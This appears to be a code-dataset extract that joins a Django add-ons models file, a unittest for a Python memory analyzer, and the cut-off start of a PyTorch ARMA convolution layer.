        return os.path.join(helpers.user_media_path('addons'),
                            str(self.addon.id), filename)

    @cached_property
    def thumb_url(self):
        """
        Handles deprecated GetPersonas URL.

        In days of yore, preview.jpg used to be a separate image.
        In modern days, we use the same image for big preview + thumb.
        """
        if self.is_new():
            return self._image_url('preview.png')
        else:
            return self._image_url('preview.jpg')

    @cached_property
    def thumb_path(self):
        """
        Handles deprecated GetPersonas path.

        In days of yore, preview.jpg used to be a separate image.
        In modern days, we use the same image for big preview + thumb.
        """
        if self.is_new():
            return self._image_path('preview.png')
        else:
            return self._image_path('preview.jpg')

    @cached_property
    def icon_url(self):
        """URL to personas square preview."""
        if self.is_new():
            return self._image_url('icon.png')
        else:
            return self._image_url('preview_small.jpg')

    @cached_property
    def icon_path(self):
        """Path to personas square preview."""
        if self.is_new():
            return self._image_path('icon.png')
        else:
            return self._image_path('preview_small.jpg')

    @cached_property
    def preview_url(self):
        """URL to Persona's big, 680px, preview."""
        if self.is_new():
            return self._image_url('preview.png')
        else:
            return self._image_url('preview_large.jpg')

    @cached_property
    def preview_path(self):
        """Path to Persona's big, 680px, preview."""
        if self.is_new():
            return self._image_path('preview.png')
        else:
            return self._image_path('preview_large.jpg')

    @cached_property
    def header_url(self):
        return self._image_url(self.header)

    @cached_property
    def footer_url(self):
        # Footer is optional; empty string when absent.
        return self.footer and self._image_url(self.footer) or ''

    @cached_property
    def header_path(self):
        return self._image_path(self.header)

    @cached_property
    def footer_path(self):
        return self.footer and self._image_path(self.footer) or ''

    @cached_property
    def update_url(self):
        # URL the client polls for theme updates, localized to the current
        # request language when we have a mapping for it.
        locale = settings.LANGUAGE_URL_MAP.get(trans_real.get_language())
        return settings.NEW_PERSONAS_UPDATE_URL % {
            'locale': locale or settings.LANGUAGE_CODE,
            'id': self.addon.id
        }

    @cached_property
    def theme_data(self):
        """Theme JSON Data for Browser/extension preview."""
        def hexcolor(color):
            return '#%s' % color

        addon = self.addon
        return {
            'id': unicode(self.addon.id),  # Personas dislikes ints
            'name': unicode(addon.name),
            'accentcolor': hexcolor(self.accentcolor),
            'textcolor': hexcolor(self.textcolor),
            'category': (unicode(addon.all_categories[0].name) if
                         addon.all_categories else ''),
            # TODO: Change this to be `addons_users.user.display_name`.
            'author': self.display_username,
            'description': unicode(addon.description),
            'header': self.header_url,
            'footer': self.footer_url or '',
            'headerURL': self.header_url,
            'footerURL': self.footer_url or '',
            'previewURL': self.preview_url,
            'iconURL': self.icon_url,
            'updateURL': self.update_url,
            'detailURL': helpers.absolutify(self.addon.get_url_path()),
            'version': '1.0'
        }

    @property
    def json_data(self):
        """Persona JSON Data for Browser/extension preview."""
        return json.dumps(self.theme_data,
                          separators=(',', ':'), cls=AMOJSONEncoder)

    def authors_other_addons(self, app=None):
        """
        Return other addons by the author(s) of this addon,
        optionally takes an app.
        """
        # NOTE(review): ``app`` is accepted but unused here, unlike
        # Addon.authors_other_addons — presumably kept for API parity.
        qs = (Addon.objects.valid()
                   .exclude(id=self.addon.id)
                   .filter(type=amo.ADDON_PERSONA))
        return (qs.filter(addonuser__listed=True,
                          authors__in=self.addon.listed_authors)
                  .distinct())

    @cached_property
    def listed_authors(self):
        return self.addon.listed_authors
class AddonCategory(caching.CachingMixin, models.Model):
    """M2M through-table linking add-ons to categories, with an optional
    per-locale feature flag."""
    addon = models.ForeignKey(Addon, on_delete=models.CASCADE)
    category = models.ForeignKey('Category')
    feature = models.BooleanField(default=False)
    # Comma-separated locales in which this category pairing is featured.
    feature_locales = models.CharField(max_length=255, default='', null=True)

    objects = caching.CachingManager()

    class Meta:
        db_table = 'addons_categories'
        unique_together = ('addon', 'category')

    @classmethod
    def creatured_random(cls, category, lang):
        # Ids of add-ons featured ("creatured") in this category/locale.
        return get_creatured_ids(category, lang)
class AddonUser(caching.CachingMixin, models.Model):
    """M2M through-table linking add-ons to their authors, with role,
    visibility and display position."""
    addon = models.ForeignKey(Addon, on_delete=models.CASCADE)
    user = UserForeignKey()
    role = models.SmallIntegerField(default=amo.AUTHOR_ROLE_OWNER,
                                    choices=amo.AUTHOR_CHOICES)
    listed = models.BooleanField(_(u'Listed'), default=True)
    position = models.IntegerField(default=0)

    objects = caching.CachingManager()

    def __init__(self, *args, **kwargs):
        super(AddonUser, self).__init__(*args, **kwargs)
        # Remember the original role/user so later code can detect changes.
        self._original_role = self.role
        self._original_user_id = self.user_id

    class Meta:
        db_table = 'addons_users'
class AddonDependency(models.Model):
    """Directed dependency edge: ``addon`` requires ``dependent_addon``."""
    addon = models.ForeignKey(Addon, related_name='addons_dependencies')
    dependent_addon = models.ForeignKey(Addon, related_name='dependent_on')

    class Meta:
        db_table = 'addons_dependencies'
        unique_together = ('addon', 'dependent_addon')
class AddonFeatureCompatibility(ModelBase):
    """Per-add-on e10s compatibility state (amo.E10S_COMPATIBILITY_CHOICES)."""
    addon = models.OneToOneField(
        Addon, primary_key=True, on_delete=models.CASCADE)
    e10s = models.PositiveSmallIntegerField(
        choices=amo.E10S_COMPATIBILITY_CHOICES, default=amo.E10S_UNKNOWN)

    def __unicode__(self):
        # Guard: unsaved instances have no pk/addon to stringify.
        return unicode(self.addon) if self.pk else u""

    def get_e10s_classname(self):
        # API/CSS class name corresponding to the current e10s value.
        return amo.E10S_COMPATIBILITY_CHOICES_API[self.e10s]
class AddonApprovalsCounter(ModelBase):
    """Model holding a counter of the number of times a listed version
    belonging to an add-on has been approved by a human. Reset everytime a
    listed version is auto-approved for this add-on."""
    addon = models.OneToOneField(
        Addon, primary_key=True, on_delete=models.CASCADE)
    # Number of human approvals since the last reset.
    counter = models.PositiveIntegerField(default=0)
    # When a human last reviewed a version (None if never).
    last_human_review = models.DateTimeField(null=True)

    def __unicode__(self):
        return u'%s: %d' % (unicode(self.pk), self.counter) if self.pk else u''

    @classmethod
    def increment_for_addon(cls, addon):
        """
        Increment approval counter for the specified addon, setting the last
        human review date to now. If an AddonApprovalsCounter already exists,
        it updates it, otherwise it creates and saves a new instance.
        """
        data = {
            'counter': 1,
            'last_human_review': datetime.now(),
        }
        obj, created = cls.objects.get_or_create(
            addon=addon, defaults=data)
        if not created:
            # F() expression: increment atomically in SQL, not in Python.
            data['counter'] = F('counter') + 1
            obj.update(**data)
        return obj

    @classmethod
    def reset_for_addon(cls, addon):
        """
        Reset the approval counter for the specified addon.
        """
        obj, created = cls.objects.update_or_create(
            addon=addon, defaults={'counter': 0})
        return obj
class DeniedGuid(ModelBase):
    """A denied add-on GUID (table `denied_guids`); `comments` holds
    free-form notes about why it was denied."""
    guid = models.CharField(max_length=255, unique=True)
    comments = models.TextField(default='', blank=True)

    class Meta:
        db_table = 'denied_guids'

    def __unicode__(self):
        return self.guid
class Category(OnChangeMixin, ModelBase):
    """An add-on category for a given application/type, addressed by slug.

    Display names normally come from the CATEGORIES constants; the db
    column only serves legacy combinations missing from those constants.
    """
    # Old name translations, we now have constants translated via gettext, but
    # this is for backwards-compatibility, for categories which have a weird
    # type/application/slug combo that is not in the constants.
    db_name = TranslatedField(db_column='name')
    slug = SlugField(max_length=50,
                     help_text='Used in Category URLs.')
    type = models.PositiveIntegerField(db_column='addontype_id',
                                       choices=do_dictsort(amo.ADDON_TYPE))
    application = models.PositiveIntegerField(choices=amo.APPS_CHOICES,
                                              null=True, blank=True,
                                              db_column='application_id')
    count = models.IntegerField('Addon count', default=0)
    weight = models.IntegerField(
        default=0, help_text='Category weight used in sort ordering')
    misc = models.BooleanField(default=False)

    addons = models.ManyToManyField(Addon, through='AddonCategory')

    class Meta:
        db_table = 'categories'
        verbose_name_plural = 'Categories'

    @property
    def name(self):
        try:
            value = CATEGORIES[self.application][self.type][self.slug].name
        except KeyError:
            # If we can't find the category in the constants dict, fall back
            # to the db field.
            value = self.db_name
        return unicode(value)

    def __unicode__(self):
        return unicode(self.name)

    def get_url_path(self):
        try:
            type = amo.ADDON_SLUGS[self.type]
        except KeyError:
            # Unknown add-on type: fall back to the extension browse URL.
            type = amo.ADDON_SLUGS[amo.ADDON_EXTENSION]
        return reverse('browse.%s' % type, args=[self.slug])

    def to_static_category(self):
        """Return the corresponding StaticCategory instance from a Category."""
        try:
            staticcategory = CATEGORIES[self.application][self.type][self.slug]
        except KeyError:
            staticcategory = None
        return staticcategory

    @classmethod
    def from_static_category(cls, static_category):
        """Return a Category instance created from a StaticCategory.
        Does not save it into the database. Useful in tests."""
        return cls(**static_category.__dict__)
# Route Category's translated field (db_name) through the translations
# machinery before each save.
dbsignals.pre_save.connect(save_signal, sender=Category,
                           dispatch_uid='category_translations')
class Preview(ModelBase):
    """A preview/screenshot image belonging to an add-on."""
    addon = models.ForeignKey(Addon, related_name='previews')
    caption = TranslatedField()
    # Manual sort order within the add-on's previews.
    position = models.IntegerField(default=0)
    # Cached pixel sizes, keys 'thumbnail' and 'image' (see properties below).
    sizes = JSONField(max_length=25, default={})

    class Meta:
        db_table = 'previews'
        ordering = ('position', 'created')

    def _image_url(self, url_template):
        # Cache-bust with the modification timestamp (0 when unsaved).
        if self.modified is not None:
            modified = int(time.mktime(self.modified.timetuple()))
        else:
            modified = 0
        # id / 1000 (Python 2 integer division) buckets files into
        # sub-directories of up to 1000 previews each.
        args = [self.id / 1000, self.id, modified]
        return url_template % tuple(args)

    def _image_path(self, url_template):
        args = [self.id / 1000, self.id]
        return url_template % tuple(args)

    def as_dict(self, src=None):
        # API-style representation; `src` is appended as a query parameter.
        d = {'full': urlparams(self.image_url, src=src),
             'thumbnail': urlparams(self.thumbnail_url, src=src),
             'caption': unicode(self.caption)}
        return d

    @property
    def thumbnail_url(self):
        template = (
            helpers.user_media_url('previews') +
            'thumbs/%s/%d.png?modified=%s')
        return self._image_url(template)

    @property
    def image_url(self):
        template = (
            helpers.user_media_url('previews') +
            'full/%s/%d.png?modified=%s')
        return self._image_url(template)

    @property
    def thumbnail_path(self):
        template = os.path.join(
            helpers.user_media_path('previews'),
            'thumbs',
            '%s',
            '%d.png'
        )
        return self._image_path(template)

    @property
    def image_path(self):
        template = os.path.join(
            helpers.user_media_path('previews'),
            'full',
            '%s',
            '%d.png'
        )
        return self._image_path(template)

    @property
    def thumbnail_size(self):
        return self.sizes.get('thumbnail', []) if self.sizes else []

    @property
    def image_size(self):
        return self.sizes.get('image', []) if self.sizes else []
# Route Preview's translated field (caption) through the translations
# machinery before each save.
dbsignals.pre_save.connect(save_signal, sender=Preview,
                           dispatch_uid='preview_translations')
def delete_preview_files(sender, instance, **kw):
    """On delete of the Preview object from the database, unlink the image
    and thumb on the file system """
    for filename in [instance.image_path, instance.thumbnail_path]:
        # Missing files are silently ignored; only existing ones are removed.
        if storage.exists(filename):
            log.info('Removing filename: %s for preview: %s'
                     % (filename, instance.pk))
            storage.delete(filename)
# Remove the image files from disk when a Preview row is deleted.
models.signals.post_delete.connect(delete_preview_files,
                                   sender=Preview,
                                   dispatch_uid='delete_preview_files')
class AppSupport(ModelBase):
    """Cache to tell us if an add-on's current version supports an app."""
    addon = models.ForeignKey(Addon, on_delete=models.CASCADE)
    # Application id (amo.APPS_CHOICES); plain integer column.
    app = models.PositiveIntegerField(choices=amo.APPS_CHOICES,
                                      db_column='app_id')
    # Supported app-version bounds as integers (version_int style).
    min = models.BigIntegerField("Minimum app version", null=True)
    max = models.BigIntegerField("Maximum app version", null=True)

    class Meta:
        db_table = 'appsupport'
        unique_together = ('addon', 'app')
class Charity(ModelBase):
    """A charity with a homepage URL and a PayPal account name."""
    name = models.CharField(max_length=255)
    url = models.URLField()
    paypal = models.CharField(max_length=255)

    class Meta:
        db_table = 'charities'

    @property
    def outgoing_url(self):
        # The FOUNDATION_ORG charity is linked directly; every other
        # charity URL goes through the outgoing-link redirector.
        if self.pk == amo.FOUNDATION_ORG:
            return self.url
        return get_outgoing_url(unicode(self.url))
class DeniedSlug(ModelBase):
    """Slugs that add-ons are not allowed to use (table `addons_denied_slug`)."""
    name = models.CharField(max_length=255, unique=True, default='')

    class Meta:
        db_table = 'addons_denied_slug'

    def __unicode__(self):
        return self.name

    @classmethod
    def blocked(cls, slug):
        # All-digit slugs are always blocked (NOTE(review): presumably to
        # avoid clashing with numeric-id URLs -- confirm); otherwise check
        # the denylist table.
        return slug.isdigit() or cls.objects.filter(name=slug).exists()
class FrozenAddon(models.Model):
    """Add-ons in this table never get a hotness score."""
    addon = models.ForeignKey(Addon)

    class Meta:
        db_table = 'frozen_addons'

    def __unicode__(self):
        return 'Frozen: %s' % self.addon_id
@receiver(dbsignals.post_save, sender=FrozenAddon)
def freezer(sender, instance, **kw):
    # Adjust the hotness of the FrozenAddon: zero it out immediately when
    # an add-on is frozen.
    if instance.addon_id:
        Addon.objects.get(id=instance.addon_id).update(hotness=0)
class CompatOverride(ModelBase):
    """Helps manage compat info for add-ons not hosted on AMO."""
    name = models.CharField(max_length=255, blank=True, null=True)
    guid = models.CharField(max_length=255, unique=True)
    # Optional link to a hosted add-on sharing the same guid.
    addon = models.ForeignKey(Addon, blank=True, null=True,
                              help_text='Fill this out to link an override '
                                        'to a hosted add-on')

    class Meta:
        db_table = 'compat_override'
        unique_together = ('addon', 'guid')

    def save(self, *args, **kw):
        # Auto-link to a hosted add-on matching the guid, if one exists.
        if not self.addon:
            qs = Addon.objects.filter(guid=self.guid)
            if qs:
                self.addon = qs[0]
        return super(CompatOverride, self).save(*args, **kw)

    def __unicode__(self):
        if self.addon:
            return unicode(self.addon)
        elif self.name:
            return '%s (%s)' % (self.name, self.guid)
        else:
            return self.guid

    def is_hosted(self):
        """Am I talking about an add-on on AMO?"""
        return bool(self.addon_id)

    @staticmethod
    def transformer(overrides):
        # Batch-attach `compat_ranges` to every override using one query,
        # avoiding a per-override query in compat_ranges below.
        if not overrides:
            return

        id_map = dict((o.id, o) for o in overrides)

        qs = CompatOverrideRange.objects.filter(compat__in=id_map)
        for compat_id, ranges in sorted_groupby(qs, 'compat_id'):
            id_map[compat_id].compat_ranges = list(ranges)

    # May be filled in by a transformer for performance.
    @cached_property
    def compat_ranges(self):
        return list(self._compat_ranges.all())

    def collapsed_ranges(self):
        """Collapse identical version ranges into one entity."""
        Range = collections.namedtuple('Range', 'type min max apps')
        AppRange = collections.namedtuple('AppRange', 'app min max')
        rv = []

        def sort_key(x):
            return (x.min_version, x.max_version, x.type)

        # Ranges sharing (min, max, type) are merged; their per-app version
        # bounds are collected in item.apps.
        for key, compats in sorted_groupby(self.compat_ranges, key=sort_key):
            compats = list(compats)
            first = compats[0]
            item = Range(first.override_type(), first.min_version,
                         first.max_version, [])
            for compat in compats:
                app = AppRange(amo.APPS_ALL[compat.app],
                               compat.min_app_version, compat.max_app_version)
                item.apps.append(app)
            rv.append(item)
        return rv
# Choices for CompatOverrideRange.type; 0 maps to 'compatible' and 1 to
# 'incompatible' in the XML output (see override_type()).
OVERRIDE_TYPES = (
    (0, 'Compatible (not supported)'),
    (1, 'Incompatible'),
)
class CompatOverrideRange(ModelBase):
    """App compatibility for a certain version range of a RemoteAddon."""
    compat = models.ForeignKey(CompatOverride, related_name='_compat_ranges')
    # 0 = compatible, 1 = incompatible (OVERRIDE_TYPES); defaults to
    # incompatible.
    type = models.SmallIntegerField(choices=OVERRIDE_TYPES, default=1)
    min_version = models.CharField(
        max_length=255, default='0',
        help_text=u'If not "0", version is required to exist for the override'
                  u' to take effect.')
    max_version = models.CharField(
        max_length=255, default='*',
        help_text=u'If not "*", version is required to exist for the override'
                  u' to take effect.')
    # Application id (amo.APPS_CHOICES); plain integer column.
    app = models.PositiveIntegerField(choices=amo.APPS_CHOICES,
                                      db_column='app_id')
    min_app_version = models.CharField(max_length=255, default='0')
    max_app_version = models.CharField(max_length=255, default='*')

    class Meta:
        db_table = 'compat_override_range'

    def override_type(self):
        """This is what Firefox wants to see in the XML output."""
        return {0: 'compatible', 1: 'incompatible'}[self.type]
class IncompatibleVersions(ModelBase):
    """
    Denormalized table to join against for fast compat override filtering.

    This was created to be able to join against a specific version record since
    the CompatOverrideRange can be wildcarded (e.g. 0 to *, or 1.0 to 1.*), and
    addon versioning isn't as consistent as Firefox versioning to trust
    `version_int` in all cases. So extra logic needed to be provided for when
    a particular version falls within the range of a compatibility override.
    """
    version = models.ForeignKey(Version, related_name='+')
    # Application id (amo.APPS_CHOICES); a plain integer, NOT a ForeignKey.
    app = models.PositiveIntegerField(choices=amo.APPS_CHOICES,
                                      db_column='app_id')
    min_app_version = models.CharField(max_length=255, blank=True, default='0')
    max_app_version = models.CharField(max_length=255, blank=True, default='*')
    # Integer forms of the bounds, kept in sync by save() for fast range
    # comparisons in SQL.
    min_app_version_int = models.BigIntegerField(blank=True, null=True,
                                                 editable=False, db_index=True)
    max_app_version_int = models.BigIntegerField(blank=True, null=True,
                                                 editable=False, db_index=True)

    class Meta:
        db_table = 'incompatible_versions'

    def __unicode__(self):
        # Bugfix: `app` is a PositiveIntegerField, so instances hold a plain
        # int with no `.id` attribute -- the previous `self.app.id` raised
        # AttributeError whenever this repr was rendered.
        return u'<IncompatibleVersion V:%s A:%s %s-%s>' % (
            self.version.id, self.app, self.min_app_version,
            self.max_app_version)

    def save(self, *args, **kw):
        # Recompute the integer bounds on every save so they can never
        # drift out of sync with the string fields.
        self.min_app_version_int = version_int(self.min_app_version)
        self.max_app_version_int = version_int(self.max_app_version)
        return super(IncompatibleVersions, self).save(*args, **kw)
def update_incompatible_versions(sender, instance, **kw):
    """Signal handler: refresh the denormalized IncompatibleVersions rows
    whenever a CompatOverrideRange changes.

    Only acts on ranges linked to a hosted extension; the actual rebuild is
    delegated to an async task in chunks of 50 version ids.
    """
    if not instance.compat.addon_id:
        return
    if not instance.compat.addon.type == amo.ADDON_EXTENSION:
        return

    # Imported lazily to avoid a circular import at module load time.
    from . import tasks
    versions = instance.compat.addon.versions.values_list('id', flat=True)
    for chunk in chunked(versions, 50):
        tasks.update_incompatible_appversions.delay(chunk)
# Keep IncompatibleVersions in sync whenever a CompatOverrideRange is
# created, updated or deleted.
models.signals.post_save.connect(update_incompatible_versions,
                                 sender=CompatOverrideRange,
                                 dispatch_uid='cor_update_incompatible')
models.signals.post_delete.connect(update_incompatible_versions,
                                   sender=CompatOverrideRange,
                                   dispatch_uid='cor_update_incompatible')
def track_new_status(sender, instance, *args, **kw):
    """post_save handler: record a status metric for newly created add-ons."""
    if kw.get('raw'):
        # The addon is being loaded from a fixture; don't track that.
        return
    if kw.get('created'):
        track_addon_status_change(instance)
# Record a metrics event every time a brand-new add-on is saved.
models.signals.post_save.connect(track_new_status,
                                 sender=Addon,
                                 dispatch_uid='track_new_addon_status')
@Addon.on_change
def track_status_change(old_attr=None, new_attr=None, **kw):
    """on_change handler: record a metric whenever `status` changes."""
    if old_attr is None:
        old_attr = {}
    if new_attr is None:
        new_attr = {}
    new_status = new_attr.get('status')
    old_status = old_attr.get('status')
    if new_status != old_status:
        track_addon_status_change(kw['instance'])
def track_addon_status_change(addon):
    """Bump the statsd counter for the add-on's current status."""
    metric = 'addon_status_change.all.status_{}'.format(addon.status)
    statsd.incr(metric)
| 37.593346 | 79 | 0.622812 |
ace75a2f90a04bc492c696b57934ce463193ca98 | 2,331 | py | Python | tests.py | delimitry/python-memory-analyzer | d593f1aa327111c168663c927d848294b7f7f7de | [
"MIT"
] | 2 | 2019-10-01T21:13:48.000Z | 2019-10-03T00:56:14.000Z | tests.py | delimitry/python-memory-analyzer | d593f1aa327111c168663c927d848294b7f7f7de | [
"MIT"
] | null | null | null | tests.py | delimitry/python-memory-analyzer | d593f1aa327111c168663c927d848294b7f7f7de | [
"MIT"
] | null | null | null | #!/usr/bin/env python
#-*- coding: utf8 -*-
from __future__ import print_function, unicode_literals
import ctypes
import struct
import unittest
from io import BytesIO
from objects import PyStringObject, PyCommonUnicodeObject, PY3
def sizeof_x64_mock(arg):
    """Stand-in for ctypes.sizeof on an LP64 (64-bit) platform.

    c_int is the only 4-byte type; every other type -- including the
    pointer-sized ones (c_size_t, c_void_p, c_long, c_char_p, c_wchar_p)
    and anything unrecognized -- reports 8 bytes.
    """
    return 4 if arg == ctypes.c_int else 8
def ctypes_x64_mock(func):
    """Decorator: run *func* with ctypes.sizeof patched to sizeof_x64_mock.

    Fixes over the previous version:
      * the original ctypes.sizeof is restored even when *func* raises
        (try/finally) -- previously one failing test left the mock installed
        and poisoned every later sizeof() call in the process;
      * the wrapped function's return value is propagated (it was dropped);
      * functools.wraps preserves the test's name/docstring so unittest
        reports the real test method instead of 'wrapper'.
    """
    from functools import wraps

    @wraps(func)
    def wrapper(*args, **kwargs):
        orig_sizeof = ctypes.sizeof
        ctypes.sizeof = sizeof_x64_mock
        try:
            return func(*args, **kwargs)
        finally:
            ctypes.sizeof = orig_sizeof
    return wrapper
class Test(unittest.TestCase):
    """
    Test python memory analyzer
    """

    @ctypes_x64_mock
    def test_py_str_read_py27(self):
        # Raw x64 CPython 2.7 PyStringObject bytes for the interned string
        # 'asd': refcnt, type pointer, size, cached hash, sstate, data
        # (field names per the assertions below).
        mem_dump = BytesIO(
            b'\x01\x00\x00\x00\x00\x00\x00\x00`\x9c\x8f\x00\x00\x00\x00\x00'
            b'\x03\x00\x00\x00\x00\x00\x00\x00\xd7\xb2x\xa1P`*\x14'
            b'\x01\x00\x00\x00asd\x00'
        )
        obj = PyStringObject.read(mem_dump)
        self.assertEqual(obj.ob_refcnt, 1)
        self.assertEqual(obj.ob_type, 0x8f9c60)
        self.assertEqual(obj.ob_size, 3)
        self.assertEqual(obj.ob_shash, 0x142a6050a178b2d7)
        self.assertEqual(obj.ob_sstate, 1)
        self.assertEqual(obj.ob_sval.decode('utf-8'), 'asd')

    @ctypes_x64_mock
    def test_py_unicode_read_py37(self):
        # Raw x64 CPython 3.7 unicode object bytes for the 3-char Cyrillic
        # string 'абв' (UCS-2 code points 0x430..0x432 at the end).
        mem_dump = BytesIO(
            b'\x01\x00\x00\x00\x00\x00\x00\x00\xc0\x92\xa4\x00\x00\x00\x00\x00'
            b'\x03\x00\x00\x00\x00\x00\x00\x00\xc5\xf2\xda3\xc4\x1f\xff\xeb\xa8'
            b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
            b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
            b'\x00\x00\x00\x00\x00\x00\x000\x041\x042\x04\x00\x001\x042\x04\x00'
        )
        obj = PyCommonUnicodeObject.read(mem_dump)
        self.assertEqual(obj.ob_refcnt, 1)
        self.assertEqual(obj.ob_type, 0x0000000000a492c0)
        self.assertEqual(obj.length, 3)
        self.assertEqual(obj.hash, 0xebff1fc433daf2c5)
        # Packed state bitfield (interned/kind/compact/ascii/ready).
        self.assertEqual(obj.state.value, 0b10101000)
        self.assertEqual(obj.data.decode('utf-8'), 'абв')
if __name__ == '__main__':
    # Run the suite directly (`python tests.py`) with verbose output.
    unittest.main(verbosity=2)
| 30.671053 | 80 | 0.642214 |
ace75b2481e2e71c921e54dca8205c7f9e4c1041 | 6,095 | py | Python | sequence2sequence/model.py | Pankajchandan/chatbot | 6e2daf1b8aac0259d8e1b1793202d9760ee6a91b | [
"MIT"
] | null | null | null | sequence2sequence/model.py | Pankajchandan/chatbot | 6e2daf1b8aac0259d8e1b1793202d9760ee6a91b | [
"MIT"
] | null | null | null | sequence2sequence/model.py | Pankajchandan/chatbot | 6e2daf1b8aac0259d8e1b1793202d9760ee6a91b | [
"MIT"
] | null | null | null | from __future__ import print_function
import time
import numpy as np
import tensorflow as tf
import sequence2sequence.config as config
class ChatBotModel(object):
    """Bucketed seq2seq chatbot graph built on TF1's legacy_seq2seq API:
    embedding attention encoder/decoder with a sampled-softmax loss."""

    def __init__(self, forward_only, batch_size):
        """forward_only: if set, we do not construct the backward pass in the model.
        """
        print('Initializing graph....')
        self.fw_only = forward_only
        self.batch_size = batch_size
        # Inference keeps all activations; training drops 50% (dropout).
        if self.fw_only == True:
            self.KEEP_PROB = 1.0
        else:
            self.KEEP_PROB = 0.5

    def _create_placeholders(self):
        # Feeds for inputs. It's a list of placeholders: one int32 vector
        # per timestep, sized for the largest bucket.
        print('Create placeholders')
        self.encoder_inputs = [tf.placeholder(tf.int32, shape=[None], name='encoder{}'.format(i))
                               for i in range(config.BUCKETS[-1][0])]
        self.decoder_inputs = [tf.placeholder(tf.int32, shape=[None], name='decoder{}'.format(i))
                               for i in range(config.BUCKETS[-1][1] + 1)]
        # Per-timestep float weights, used to mask padding in the loss.
        self.decoder_masks = [tf.placeholder(tf.float32, shape=[None], name='mask{}'.format(i))
                              for i in range(config.BUCKETS[-1][1] + 1)]

        # Our targets are decoder inputs shifted by one (to ignore <s> symbol)
        self.targets = self.decoder_inputs[1:]

    def _inference(self):
        print('Create inference')
        # If we use sampled softmax, we need an output projection.
        # Sampled softmax only makes sense if we sample less than vocabulary size.
        if config.NUM_SAMPLES > 0 and config.NUM_SAMPLES < config.DEC_VOCAB:
            w = tf.get_variable('proj_w', [config.HIDDEN_SIZE, config.DEC_VOCAB])
            b = tf.get_variable('proj_b', [config.DEC_VOCAB])
            self.output_projection = (w, b)

        # Closure over (w, b); sampled softmax avoids the full DEC_VOCAB
        # softmax at training time.
        def sampled_loss(labels, logits):
            labels = tf.reshape(labels, [-1, 1])
            return tf.nn.sampled_softmax_loss(tf.transpose(w), b, labels, logits,
                                              config.NUM_SAMPLES, config.DEC_VOCAB)
        self.softmax_loss_function = sampled_loss

        # Multi-layer LSTM with output dropout on each layer.
        single_cell = tf.nn.rnn_cell.DropoutWrapper(tf.nn.rnn_cell.LSTMCell(config.HIDDEN_SIZE), output_keep_prob=self.KEEP_PROB)
        self.cell = tf.nn.rnn_cell.MultiRNNCell([single_cell] * config.NUM_LAYERS)

    def _create_loss(self):
        print('Creating loss...')
        start = time.time()

        # do_decode=True feeds each predicted token back in (inference);
        # False feeds the ground-truth decoder inputs (training).
        def _seq2seq_f(encoder_inputs, decoder_inputs, do_decode):
            return tf.contrib.legacy_seq2seq.embedding_attention_seq2seq(
                encoder_inputs, decoder_inputs, self.cell,
                num_encoder_symbols=config.ENC_VOCAB,
                num_decoder_symbols=config.DEC_VOCAB,
                #embedding_size=config.HIDDEN_SIZE,
                embedding_size=config.EMBED_SIZE,
                output_projection=self.output_projection,
                feed_previous=do_decode)

        if self.fw_only:
            self.outputs, self.losses = tf.contrib.legacy_seq2seq.model_with_buckets(
                self.encoder_inputs,
                self.decoder_inputs,
                self.targets,
                self.decoder_masks,
                config.BUCKETS,
                lambda x, y: _seq2seq_f(x, y, True),
                softmax_loss_function=self.softmax_loss_function)
            # If we use output projection, we need to project outputs for decoding.
            if self.output_projection:
                for bucket in range(len(config.BUCKETS)):
                    self.outputs[bucket] = [tf.matmul(output,
                                            self.output_projection[0]) + self.output_projection[1]
                                            for output in self.outputs[bucket]]
        else:
            self.outputs, self.losses = tf.contrib.legacy_seq2seq.model_with_buckets(
                self.encoder_inputs,
                self.decoder_inputs,
                self.targets,
                self.decoder_masks,
                config.BUCKETS,
                lambda x, y: _seq2seq_f(x, y, False),
                softmax_loss_function=self.softmax_loss_function)
        print('Time:', time.time() - start)

    def _creat_optimizer(self):
        # (sic: method name kept as-is for external callers.)
        print('Creating optimizer... ')
        with tf.variable_scope('training') as scope:
            self.global_step = tf.Variable(0, dtype=tf.int32, trainable=False, name='global_step')

            if not self.fw_only:
                self.optimizer = tf.train.AdamOptimizer(config.LR)
                #self.optimizer = tf.train.GradientDescentOptimizer(config.LR)
                trainables = tf.trainable_variables()
                self.gradient_norms = []
                self.train_ops = []
                start = time.time()
                # One clipped-gradient train op per bucket.
                for bucket in range(len(config.BUCKETS)):
                    clipped_grads, norm = tf.clip_by_global_norm(tf.gradients(self.losses[bucket],
                                                                              trainables),
                                                                 config.MAX_GRAD_NORM)
                    self.gradient_norms.append(norm)
                    self.train_ops.append(self.optimizer.apply_gradients(zip(clipped_grads, trainables),
                                                                         global_step=self.global_step))
                    print('Creating opt for bucket {} took {} seconds'.format(bucket, time.time() - start))
                    start = time.time()

    def _create_summary(self):
        # Summaries not implemented yet.
        pass

    def build_graph(self):
        """Assemble the full graph: placeholders, cells, loss, optimizer."""
        self._create_placeholders()
        self._inference()
        self._create_loss()
        self._creat_optimizer()
        self._create_summary()
ace75c3fb7827df5e944ed9bb9fb1eac9cff1c0c | 6,251 | py | Python | code/network/backbone/arma.py | bshantam97/arma_networks_image_segmentation | f1ac5396afe2a77f4b809a21e9d048fa75c48781 | [
"MIT"
] | 3 | 2020-08-17T16:09:00.000Z | 2021-02-02T04:52:17.000Z | code/network/backbone/arma.py | bshantam97/arma_networks_image_segmentation | f1ac5396afe2a77f4b809a21e9d048fa75c48781 | [
"MIT"
] | 1 | 2020-10-14T02:21:46.000Z | 2020-10-14T02:21:46.000Z | code/network/backbone/arma.py | bshantam97/arma_networks_image_segmentation | f1ac5396afe2a77f4b809a21e9d048fa75c48781 | [
"MIT"
] | 1 | 2020-10-29T04:37:21.000Z | 2020-10-29T04:37:21.000Z | # header files
import math
import torch
import torch.nn as nn
class ARMA2d(nn.Module):
    """2D ARMA layer: a standard Conv2d (the moving-average part, `w_*`
    arguments) followed by a learnable autoregressive filter applied to its
    output (`a_*` arguments)."""

    def __init__(self, in_channels, out_channels, w_kernel_size=3, w_padding_mode='zeros', w_padding=0, w_stride=1, w_dilation=1, w_groups=1, bias=False, a_kernel_size=3, a_padding_mode='circular', a_padding=0, a_stride=1, a_dilation=1):
        """
        Initialization of 2D-ARMA layer.

        NOTE(review): `w_padding_mode` is accepted but not forwarded to
        nn.Conv2d below -- confirm whether that is intended.
        """
        super(ARMA2d, self).__init__()
        self.moving_average = nn.Conv2d(in_channels, out_channels, w_kernel_size, padding=w_padding, stride=w_stride, dilation=w_dilation, groups=w_groups, bias=bias)
